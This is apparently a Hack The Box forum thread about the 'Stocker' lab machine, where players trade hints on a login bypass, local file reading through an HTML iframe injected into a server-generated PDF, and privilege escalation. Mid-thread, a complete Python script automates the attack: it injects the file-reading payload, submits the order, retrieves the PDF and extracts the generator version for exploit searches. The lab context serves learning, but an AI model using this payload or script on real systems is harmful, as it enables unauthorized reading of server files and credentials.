Official Stocker Discussion

I can log in… but I DON’T know how to exploit the stock page and what type of info I am expecting. I used those payloads. It does not work.

It is not a database leak, it is a system leak; search for LFI vulnerabilities :heart:

How to perform LFI? I found it executes HTML code.

EDIT: Got it, thank you!

Make sure you update your /etc/hosts file. I’ve had to do this on most machines lately.

How?

Open the PDF in a text editor and look for the PDF generator version at the beginning… google the generator’s version for an exploit.

I meant that way you can only read the contents of /etc/passwd, but how do you privesc with this?

yep

dependency.yml

How did you figure out about index.js?

I wrote an interesting script in Python which fully automates LFI. If you guys found the way to read files, I can share it with you just for education purposes.

UPD: Rooted! Feel free to DM me for any help

Is someone else having trouble opening the redirect to stocker.htb? The site won’t open at all, neither with VPN nor with Pwnbox. Same problem for the “soccer” machine…

I’m having this problem as well. I can’t see the whole of /etc/passwd either.

EDIT: nevermind found a way. Look here for more info: XSS with Dynamic PDF | Exploit Notes

I got the login bypass, read through this whole thread, and got different takes, left and right.

One says to edit the “title” field within the intercepted request within BurpSuite and to insert the embedded payload (@socks) which, I take it, means the frame one. Another says to look at the PDF version (@MapleLeaf1998), and another still to “regenerate the receipt PDF as it pleases me” (@Paradise_R), WHAT?

I attempted ALL of these things as well as consulted the XSS with Dynamic PDF page that @guruprk linked, which is where I learned about the frame, but I am still stuck. I’ve absolutely zero ideas on how to proceed. It’s either a SyntaxError, or “success”:true with the “orderId” and THAT’S IT. Then I read about the ones writing “EASY” or “Rooted in 15 mins, such an easy box!” :melting_face:

I can’t seem to figure out where to pass the payload. Do I pass it when pressing Submit Purchase? Passing payloads in Burp just gets me a 200 page with “success”:true and “orderId”. I can’t find anywhere that a payload would be passed when generating the PDF. Not sure where to go from here.

Edit: OK, I did the same thing as before but it seems to be working now. Now I just need to figure out where to get a password. Also, if you add the attribute

style="height:1000px;width:100%;border:none;"

to your iframe, it will display the whole file in the PDF.
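Putting the pieces from this thread together (the iframe in the “title” field, the style attribute from the post above, the “success”:true / orderId reply, the /api/po/<orderId> PDF, and the generator version string near the top of the PDF from an earlier reply), here is an added Python example; it is not code from any poster in this thread. The order-submission endpoint (/api/order), the basket JSON layout in SAMPLE_ORDER and the cookie handling are assumptions, so take the real path and body from the Submit Purchase request in Burp; the title field and the /api/po/ path are the ones named in the thread.

```python
import json
import re
import sys
import urllib.request

# Constructed sample of the JSON body sent on "Submit Purchase". The field
# layout is an assumption; only the "title" key matters for the payload.
SAMPLE_ORDER = {
    "basket": [
        {"_id": "0000", "title": "Cup", "description": "A cup", "price": 10, "amount": 1}
    ],
}


def build_iframe_payload(path, height_px=1000):
    """Iframe that makes the server-side PDF renderer load a local file.

    The style attribute is the one from the post above: without an explicit
    height the rendered PDF only shows the first few lines of the file.
    """
    return (
        f'<iframe src="file://{path}" '
        f'style="height:{height_px}px;width:100%;border:none;"></iframe>'
    )


def inject_into_titles(obj, payload):
    """Return a copy of the order with every 'title' value replaced by payload.

    Walking the structure instead of hard-coding basket[0].title means the
    same function works whatever the captured request body looks like.
    """
    if isinstance(obj, dict):
        return {k: (payload if k == "title" else inject_into_titles(v, payload))
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [inject_into_titles(v, payload) for v in obj]
    return obj


def parse_order_id(response_text):
    """Pull orderId out of the {"success":true,"orderId":...} reply."""
    data = json.loads(response_text)
    if not data.get("success"):
        raise ValueError(f"order was not accepted: {response_text!r}")
    return data["orderId"]


def po_url(base_url, order_id):
    """URL of the generated purchase-order PDF (/api/po/<orderId> from the thread)."""
    return f"{base_url.rstrip('/')}/api/po/{order_id}"


def pdf_producer(pdf_bytes):
    """Extract the /Producer string, i.e. the PDF generator and its version.

    Only the plain "(...)" string form is handled; hex strings or metadata in
    compressed object streams need pdfinfo or a real PDF parser.
    """
    m = re.search(rb"/Producer\s*\(([^)]*)\)", pdf_bytes)
    return m.group(1).decode("latin-1") if m else None


def fetch_file_as_pdf(base_url, order, path, cookie=None, order_endpoint="/api/order"):
    """Submit the poisoned order and return the PDF bytes.

    order_endpoint is an assumption: use the path Burp shows for the Submit
    Purchase request. cookie is the logged-in session cookie. Needs the HTB
    VPN, so the tests do not call this.
    """
    headers = {"Content-Type": "application/json"}
    if cookie:
        headers["Cookie"] = cookie
    body = json.dumps(inject_into_titles(order, build_iframe_payload(path))).encode()
    req = urllib.request.Request(base_url.rstrip("/") + order_endpoint,
                                 data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req) as resp:
        order_id = parse_order_id(resp.read().decode())
    req = urllib.request.Request(po_url(base_url, order_id), headers=headers)
    with urllib.request.urlopen(req) as resp:
        return resp.read()


if __name__ == "__main__":
    # usage: python lfi_pdf.py http://stocker.htb /etc/passwd "connect.sid=..."
    base, path = sys.argv[1], sys.argv[2]
    cookie = sys.argv[3] if len(sys.argv) > 3 else None
    pdf = fetch_file_as_pdf(base, SAMPLE_ORDER, path, cookie)
    out = path.strip("/").replace("/", "_") + ".pdf"
    with open(out, "wb") as fh:
        fh.write(pdf)
    print(f"saved {out}; producer: {pdf_producer(pdf)}")
```

The iframe is placed inside a JSON string, so json.dumps handles the quoting for you; hand-editing the body in Burp is where the SyntaxError replies mentioned above usually come from. Run pdftotext on the saved file to read the rendered contents, and feed the producer string to a search for known issues in that generator version.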

Just write some HTML code and see the output; you will figure it out.

Alright, will try that out, thanks!

Thanks for the heads up, I’ll test that out. What I did, similarly to the code you wrote about the dimensions of the frame, is include an opening and closing frame tag with the dimensions. The issue was where to put it! I tried inserting it into the title field as well as into the second pair of double quotes next to the title, but nothing worked out. Will test more!

I meant the PDF is generated with user input, so you can alter it as much as you wish, as long as it doesn’t throw errors :heart:

I figured it out. The problem was that I was not copying the order ID after “/api/po/” to see the output with the correct dimensions as well. It was literally in front of my eyes.

I’m lost for root. I can’t find any obvious privesc paths. I should be able to run JavaScript files in the /usr/local/scripts directory, but I can’t figure out that angle of attack. I can’t create or read any .js files in that directory. Tips?